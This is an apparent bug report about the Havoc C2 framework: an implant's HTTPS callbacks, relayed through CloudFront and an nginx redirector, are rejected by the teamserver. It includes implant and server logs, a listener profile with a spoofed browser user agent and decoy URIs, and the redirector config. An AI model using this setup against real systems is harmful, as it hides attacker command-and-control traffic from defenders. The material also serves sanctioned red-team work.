The payload executes and is trying to reach the teamserver but the teamserver does not respond to callback. I'm using an nginx reverse proxy, and I can see the callback reaching the teamserver because it prints something about the user-agent not being valid.
To be fair this is probably more an issue with the teamserver than the demon.
Did You Do a Pull First?
Latest (You performed a pull first)
Did You Try With the Dev Branch?
Yes (You tried using the dev branch but the problem persist)
Relevant log output
Y:\>demon.x64.exe
[DEBUG::WinMain::5] WinMain: hInstance:[00000073f63fb000] hPrevInstance:[00007ff72e6c4500] lpCmdLine:[] nShowCmd:[778847488]
[DEBUG::DemonInit::290] TRANSPORT_HTTP
[DEBUG::DemonInit::393] OSVersion: 10
[DEBUG::DemonConfig::581] Config Size: 650
[DEBUG::DemonConfig::588] Sleep: 2 (15%)
[DEBUG::DemonConfig::593] [CONFIG] Memory:
- Allocate: 2
- Execute : 2
[DEBUG::DemonConfig::609] [CONFIG] Spawn:
- [x64] => C:\Windows\System32\mtstocom.exe
- [x86] => C:\Windows\SysWOW64\mtstocom.exe
[DEBUG::DemonConfig::629] [CONFIG] Sleep Obfuscation:
- Technique: 0
- Stack Dup: FALSE
[CONFIG] ProxyLoading: 0
[CONFIG] SysIndirect : FALSE
[CONFIG] AmsiEtwPatch: 0
[DEBUG::DemonConfig::645] KillDate: 0
[DEBUG::DemonConfig::667] [CONFIG] Hosts [1]
:[DEBUG::DemonConfig::673] - d[redacted].cloudfront.net:443
[DEBUG::HostAdd::359] Host -> Host:[d[redacted].cloudfront.net] Size:[60] Port:[443]
[DEBUG::DemonConfig::682] Hosts added => 1
[DEBUG::DemonConfig::686] Host going to be used is => d[redacted].cloudfront.net:443
[DEBUG::DemonConfig::690] [CONFIG] Secure: TRUE
[DEBUG::DemonConfig::696] [CONFIG] UserAgent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
[DEBUG::DemonConfig::701] [CONFIG] Headers [1]:
[DEBUG::DemonConfig::709] - Content-type: */*
[DEBUG::DemonConfig::717] [CONFIG] Uris [2]:
[DEBUG::DemonConfig::725] - /book-an-appointment.html
[DEBUG::DemonConfig::725] - /results.html
[DEBUG::DemonConfig::762] [CONFIG] [PROXY] Disabled
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "WS2_32.DLL": 00007fffcc9e0000
[DEBUG::RtWs2_32::383] Loaded Ws2_32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "SHELL32.DLL": 00007fffcb270000
[DEBUG::RtShell32::198] Loaded Shell32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "NETAPI32.DLL": 00007fffbd450000
[DEBUG::RtNetApi32::339] Loaded NetApi32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "OLEAUT32.DLL": 00007fffcc6b0000
[DEBUG::RtOleaut32::132] Loaded Oleaut32 functions
[DEBUG::RtUser32::166] Loaded User32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "WINHTTP.DLL": 00007fffc2480000
[DEBUG::RtWinHttp::496] Loaded WinHttp functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "SSPICLI.DLL": 00007fffca190000
[DEBUG::RtSspicli::423] Loaded Sspicli functions
[DEBUG::RtGdi32::300] Loaded Gdi32 functions
[DEBUG::RtMsvcrt::230] Loaded Msvcrt functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "ADVAPI32.DLL": 00007fffcc780000
[DEBUG::RtAdvapi32::57] Loaded Advapi32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "IPHLPAPI.DLL": 00007fffc9670000
[DEBUG::RtIphlpapi::263] Loaded Iphlpapi functions
[DEBUG::SysNtQueryInformationProcess::227] NtQueryInformationProcess( ... ) = 00000000
[DEBUG::CfgQueryEnforced::1248] Control Flow Guard Policy Enabled = FALSE
[DEBUG::DemonInit::570] Instance DemonID => 21f1808a
[DEBUG::SysNtOpenThreadToken::55] NtOpenThreadToken( ... ) = c000007c
[DEBUG::SysNtOpenProcessToken::68] NtOpenProcessToken( ... ) = 00000000
[DEBUG::SysNtQueryInformationToken::410] NtQueryInformationToken( ... ) = 00000000
[DEBUG::SysNtClose::451] NtClose( ... ) = 00000000
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
^C
Nginx logs:
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:41 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:43 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:46 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:48 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
Teamserver logs:
$ ./havoc server --profile ./profiles/havoc.yaotl -v --debug-dev
_______ _______ _______
│\ /│( ___ )│\ /│( ___ )( ____ \
│ ) ( ││ ( ) ││ ) ( ││ ( ) ││ ( \/
│ (___) ││ (___) ││ │ │ ││ │ │ ││ │
│ ___ ││ ___ │( ( ) )│ │ │ ││ │
│ ( ) ││ ( ) │ \ \_/ / │ │ │ ││ │
│ ) ( ││ ) ( │ \ / │ (___) ││ (____/\
│/ \││/ \│ \_/ (_______)(_______/
pwn and elevate until it's done
[08:36:45] [INFO] Havoc Framework [Version: 0.7] [CodeName: Bites The Dust]
[08:36:45] [INFO] Havoc profile: ./profiles/havoc.yaotl
[08:36:45] [INFO] Build:
- Compiler x64 : data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc
- Compiler x86 : data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc
- Nasm : /usr/bin/nasm
[08:36:45] [INFO] Time: 10/01/2024 08:36:45
[08:36:45] [INFO] Teamserver logs saved under: data/loot/2024.01.10._08:36:45
[08:36:45] [INFO] Starting Teamserver on wss://0.0.0.0:50050
[08:36:45] [INFO] [SERVICE] starting service handle on wss://0.0.0.0:50050/service-endpoint
[08:36:45] [INFO] Opens existing database: data/teamserver.db
[08:36:45] [INFO] Started "Agent Listener - HTTPs" listener: https://0.0.0.0:443
[08:37:01] [GOOD] User <test> Authenticated
[08:39:41] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:43] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:46] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:48] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
Excerpt from profile:
[...]
Demon {
Sleep = 2
Jitter = 15
TrustXForwardedFor = true
Injection {
Spawn64 = "C:\\Windows\\System32\\mtstocom.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\mtstocom.exe"
}
}
Listeners {
Http {
Name = "Agent Listener - HTTPs"
Hosts = [
"d[REDACTGED].cloudfront.net"
]
HostBind = "0.0.0.0"
PortBind = 443
PortConn = 443
HostRotation = "round-robin"
Secure = true
UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
Uris = [
"/book-an-appointment.html",
"/results.html",
]
Headers = [
]
Response {
Headers = [
]
}
}
}
Nginx config:
location "/book-an-appointment.html" {
error_page 403 = @proxied;
include blockedips.conf;
proxy_pass https://[teamserver-ip]:443;
proxy_set_header Host $host:443;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header "User-Agent" "${http_user_agent} - Original IP ${remote_addr}";
}
location "/results.html" {
error_page 403 = @proxied;
include blockedips.conf;
proxy_pass https://[teamserver-ip]:443;
proxy_set_header Host $host:443;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header "User-Agent" "${http_user_agent} - Original IP ${remote_addr}";
}
blockedips.conf is set to allow all for testing purposes.
Did You Read Over Your Issue First?
[X] I declare I made an effort and provided the necessary information for replication of the issue.
What happened?
The payload executes and is trying to reach the teamserver but the teamserver does not respond to callback. I'm using an nginx reverse proxy, and I can see the callback reaching the teamserver because it prints something about the user-agent not being valid. To be fair this is probably more an issue with the teamserver than the demon.
Did You Do a Pull First?
Latest (You performed a pull first)
Did You Try With the Dev Branch?
Yes (You tried using the dev branch but the problem persist)
Relevant log output
Did You Read Over Your Issue First?